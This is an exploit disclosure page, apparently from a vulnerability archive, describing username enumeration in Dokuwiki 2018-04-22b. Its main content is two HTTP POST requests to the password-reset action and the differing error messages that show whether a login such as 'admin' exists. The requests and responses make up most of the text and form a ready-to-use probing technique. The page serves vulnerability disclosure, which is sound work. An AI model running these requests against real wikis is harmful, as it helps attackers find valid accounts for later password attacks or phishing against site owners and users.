Dokuwiki 2018-04-22b Username Enumeration

2019.12.03

Credit: Talha Sen

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :
# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=sss
# Response for non-valid user(sss):
<div class="error">Sorry, we can't find this user in our database.</div>
========================================================================
# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=admin
# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dokuwiki 2018-04-22b Username Enumeration

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.